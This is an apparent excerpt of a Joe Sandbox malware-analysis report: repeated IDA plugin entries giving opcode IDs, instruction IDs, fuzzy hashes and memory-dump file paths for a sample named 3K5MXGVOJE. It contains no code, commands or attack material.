                                        • Instruction ID: 08b6c533c8e943c4f5acfa23e8dd00aec07a2496f85b636a8886f8a97ff7d0ea
                                        • Opcode Fuzzy Hash: f779cc50c9de09c777a66ebd69e1c016389df81fe89fe207bcdc659849b99f04
                                        • Instruction Fuzzy Hash: C6F0CD2E60E3C04FD71B9B7869713753F329F83645F0908EB8081CB1A3E6698445C31A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1061158264.0000000002B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b40000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9ce740fb723ab1bc0b7cf3e8211843bb0926bbe31167babfdf5f0b61974cc90e
                                        • Instruction ID: 883072ffc12bffef93d79ae4da4a3f65834dc8e44f32dc0e45fb727443dfab1e
                                        • Opcode Fuzzy Hash: 9ce740fb723ab1bc0b7cf3e8211843bb0926bbe31167babfdf5f0b61974cc90e
                                        • Instruction Fuzzy Hash: E9F027313062004BC32476399C8024BBBEBDFC9210754047ED445D3342CD769C019BA5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1061158264.0000000002B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b40000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f0c58c050356b333f48dc421c7fdb9e510a7cf6f34a3f1cd725891060db9f5bb
                                        • Instruction ID: ffcb824ed0e7277cf0296097cc1a912b6f55e28a57384f062c52ce29852a5b08
                                        • Opcode Fuzzy Hash: f0c58c050356b333f48dc421c7fdb9e510a7cf6f34a3f1cd725891060db9f5bb
                                        • Instruction Fuzzy Hash: 99F0A031305B148B833CAA3EA894417B3EBAFC971132445BEE10AC7380CE32DC56CB60
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1061158264.0000000002B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b40000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0f0dfdfa65da760eda2cd831212de8de265e5bcbb871faa48fcd7a797bea573d
                                        • Instruction ID: dd7dc5acedc9ae79dab957d981037c1606ed86165c3d1bea67e5d6be44d97558
                                        • Opcode Fuzzy Hash: 0f0dfdfa65da760eda2cd831212de8de265e5bcbb871faa48fcd7a797bea573d
                                        • Instruction Fuzzy Hash: 75F082333012454F8F595A2E998540BBB9BAFD552435980AAA509CB311CA31DC124795
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1061158264.0000000002B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b40000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5fb96460856218ed56f7d35735f417e3682ff06866e080ed84dea8ba9d02c988
                                        • Instruction ID: d2508366f763de31210ec1797ab18e02acfaa7cedff20188a1ea796719b382cb
                                        • Opcode Fuzzy Hash: 5fb96460856218ed56f7d35735f417e3682ff06866e080ed84dea8ba9d02c988
                                        • Instruction Fuzzy Hash: F4F08C363480501FC351DB7EE89489ABBE5DF8B26631941EAE14DC7372C9119C05CB50
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067774822.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_51a0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0126c3a85e7e7d01967b3f16b08d9f1e24da697ae418078c078b9fa8fbf0990a
                                        • Instruction ID: a9e186eed2ecbdb3564bcdf0de9f11b334e0d3406bb8a3af33118ec0f1578edb
                                        • Opcode Fuzzy Hash: 0126c3a85e7e7d01967b3f16b08d9f1e24da697ae418078c078b9fa8fbf0990a
                                        • Instruction Fuzzy Hash: 4AF0580670F3D04FDB2BA77928246692FA21E9745031A04E788C1CF297CA588C4AC763
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067774822.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_51a0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 89f78509c0ad69f267e55a633ffa3769d52794281564b75a835093b6540b9d35
                                        • Instruction ID: 12b4e54c41c930f095aedb13a1dd5be32cd3b46668279b8ba477e9ebc370a837
                                        • Opcode Fuzzy Hash: 89f78509c0ad69f267e55a633ffa3769d52794281564b75a835093b6540b9d35
                                        • Instruction Fuzzy Hash: 98F0E25A209AC04FD34743686820268BFA25F97440B5940E6D095DB2A7E56888168357
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067774822.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_51a0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 145dceab79f57c0f79a4747fbefd89c13dbf1837efda7d55eef7176d6a3ac84d
                                        • Instruction ID: e4681e797bab4e260d538223f91df9501c775238d36c2f73ab3b44dcc16bcdee
                                        • Opcode Fuzzy Hash: 145dceab79f57c0f79a4747fbefd89c13dbf1837efda7d55eef7176d6a3ac84d
                                        • Instruction Fuzzy Hash: 40F0A01A74E3D00FD37B22782C302683FA21F87411B1E00E7C481CB6D7DA588846A367
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067774822.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_51a0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 853fb9fd7186899074e6d72dda97d318d144dd39168fb978559c776825d1e19d
                                        • Instruction ID: 6daf4400dd4eaedc7646706a78d434bdb8bc9cd7d1211c5589e540ce141f8540
                                        • Opcode Fuzzy Hash: 853fb9fd7186899074e6d72dda97d318d144dd39168fb978559c776825d1e19d
                                        • Instruction Fuzzy Hash: 1EE02B2B61D3C08FD7078778AC147643F325F8710178A44EFC4808F152D114585A831B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067774822.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_51a0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7d770c196870923b2245d31153ddcbfe577ade475aa1b3606300aff207c54df5
                                        • Instruction ID: f7800399dad62ccefd3c2277bbf51360e752c5f5cc1cd800347682c4c1770c49
                                        • Opcode Fuzzy Hash: 7d770c196870923b2245d31153ddcbfe577ade475aa1b3606300aff207c54df5
                                        • Instruction Fuzzy Hash: B1E012A660E3D01EC30317347C322A83F611AA31A0B6A11E7D8E08B2E7D6040D48C3A6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067774822.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_51a0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ef1e30b317642419196e38804c3d30c528cc16a80c834903b371b33f1815eafd
                                        • Instruction ID: 7945e52e05964859a0a42a5318669093f97a1cc061a9f1f333e0082f21e4d5d9
                                        • Opcode Fuzzy Hash: ef1e30b317642419196e38804c3d30c528cc16a80c834903b371b33f1815eafd
                                        • Instruction Fuzzy Hash: F1E0E53AB00200AB9B559E8EE440D6AB7EBEFC4630720C067A405CB724DF308C01D7A0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1061158264.0000000002B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b40000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d5e1f2a8483a6bc4ab98941b83f10fb93a33346c1adb34ede639afcf738ce9a3
                                        • Instruction ID: 1bb4f84bfe5d45c9da811365d1bd1dd2ad38e95be97b21d630d53f112c9132f7
                                        • Opcode Fuzzy Hash: d5e1f2a8483a6bc4ab98941b83f10fb93a33346c1adb34ede639afcf738ce9a3
                                        • Instruction Fuzzy Hash: 5AE0D8317022148B8324763EAC8041FB7EBDFC9764350047ED50AD7341CD36DC029B94
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067774822.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_51a0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 71db21fcde7fcc37d09556ca21ebf364f59726586c9e71a9b369d92f697244b0
                                        • Instruction ID: 18fefcb586840ebef09f7e323f855ae1e384e531b1aa21865e01c04d3549be06
                                        • Opcode Fuzzy Hash: 71db21fcde7fcc37d09556ca21ebf364f59726586c9e71a9b369d92f697244b0
                                        • Instruction Fuzzy Hash: 16F0EC3670020DDBCF169E7DC4004AA7B67BFCD211B108039F80456211DB31C4D1DB85
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069652196.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5a00000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 09ca70427648c86d149f47985096da7e373092c568242858336c2a023732f957
                                        • Instruction ID: befdf16098a96803a6a3fed651d7544ba6beff67bb0afe0aa305ac055a60a70b
                                        • Opcode Fuzzy Hash: 09ca70427648c86d149f47985096da7e373092c568242858336c2a023732f957
                                        • Instruction Fuzzy Hash: 11F0A939204204CFD7059F14E449A94BBB2FF8A318F2AC0E9E419DB292CB3ADC07CB01
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067774822.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_51a0000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ffac7021633c0a7b67f057f835a16d4dd394fa36c3f7aba4f2ad76a731d25542
                                        • Instruction ID: 505d60bf583a46a3540dd0d145aa29260c3d058b507afd623b91fd2352f95afa
                                        • Opcode Fuzzy Hash: ffac7021633c0a7b67f057f835a16d4dd394fa36c3f7aba4f2ad76a731d25542
                                        • Instruction Fuzzy Hash: 8EE0927920F7C04FCB175760A9283903F229B47215B2A05FDD491CB2A3D4295559DB25
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1069652196.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5a00000_3K5MXGVOJE.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aa8cedd26786332a2e46f65632e817b87fff8596e9a1400e36f9f166afdbe608
                                        • Instruction ID: 54da0b662f859e006d26ec93a058f08349e3b30a027d833576ed3d16e09f396c
                                        • Opcode Fuzzy Hash: aa8cedd26786332a2e46f65632e817b87fff8596e9a1400e36f9f166afdbe608
                                        • Instruction Fuzzy Hash: 1FE0927A6043409BCB034B94D904851FF75AF9922532E84DAE1888B262C233DC93CB90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1067774822.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_51a0000_3K5MXGVOJE.jbxd
                                        Similarity